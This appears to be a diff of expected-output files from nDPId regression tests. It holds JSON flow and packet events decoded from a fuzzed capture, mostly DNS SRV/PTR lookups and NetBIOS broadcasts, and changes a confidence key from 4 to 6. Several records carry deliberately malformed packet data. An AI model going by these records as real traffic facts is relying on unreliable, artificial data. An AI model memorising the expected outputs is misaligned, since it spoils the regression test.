{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469985981,"flow_last_seen":1120469990981,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469990981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2115,"global_ts_msec":1120470000407} 00619{"packet_event_id":1,"packet_event_name":"packet","packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":243,"pkt_type":2115,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":243,"pkt_l4_len":0,"thread_ts_msec":1120469994988,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCENFAADlXL4AAIARWNHAqAEpwKgB\/wCKAIoA0SAWEQKRS8CoASkAigC7AAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEbuRVBGQ0VMRUhGQ0VQRkZGQUNBQyVzAENBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlxU0xPVFxCUk9XU0UAAQCA\/AoATEFCMTExAAAAAA+y781oIgUBAxAAAA8BVaoA"} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1120470002989,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470002989,"pkt":"ADBUADRWAODtAW69CABFAABEalgAAIARTP3AqAECwKgBAQq3ADUAMKhFfMIAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1120470002991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470002991,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CrcAR4rBfMKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbChvc3QA"} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470002991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470002991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470015072,"flow_last_seen":1120470015072,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1120470015072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470015072,"pkt":"ADBUADRWAODtQW69CABFAABIaloAAIARTPfAqAECwKgBAQq4ADUANOBJScMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470015072,"flow_last_seen":1120470015072,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470015072,"flow_last_seen":1120470015072,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1120470016067,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470016067,"pkt":"ADBUADRWAODtAW69CABFAABIalsAAIARTPbAqAECwKgBAQq4ADUANOBJScMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1120470018070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470018070,"pkt":"ADBUADRWAODtAW69CABFAABIamEAAIARTPDAqAECwKgBAQq4ADUAGOBJScMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470019512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1120470019512,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470019512,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOamMAAIARS+rAqAECwKgB\/wBYAIkAOluMhQ8BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAEgAAE="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470019512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470019512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469839664,"flow_last_seen":1120469839664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470024079,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469839664,"flow_last_seen":1120469839664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470024079,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470024079,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470024079,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469831652,"flow_last_seen":1120469835658,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470024079,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1120470032081,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470032081,"pkt":"ADBUADRWAODtAW69CABFAABEamYAAIARTO\/AqAGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470032083,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1120470032083,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470032083,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CrkARxK+9MOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAfRAACwlsb2NhbGhvc3QA"} 
-00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470032083,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470032083,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032178,"flow_last_seen":1120470032178,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470032178,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1120470032178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470032178,"pkt":"ADBUADRWAODtAW69CABFAABIO2gAAIARTOnAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhIAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032178,"flow_last_seen":1120470032178,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470032178,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032178,"flow_last_seen":1120470032178,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470032178,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470033172,"flow_last_seen":1120470033172,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470033172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":240,"flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1120470033172,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470033172,"pkt":"ADBUADRWAODtAXO9CABFAABIamkAAIDwTOjAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp18mEDbmV0AAAhAAE="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470035175,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1120470035175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470035175,"pkt":"ADBUADRWAODtAW69CABFAABIamoAAIARTOfAqAEiwKgBAQq6ADUANMsPhMQBAAABAAAAiwAABF9zaXAEX3VkcAQlcwBwB2JyVmp1bGEDbmV0AAAhAAE="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470035175,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?p.brvjula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28679,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470035175,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?p.brvjula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28679,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 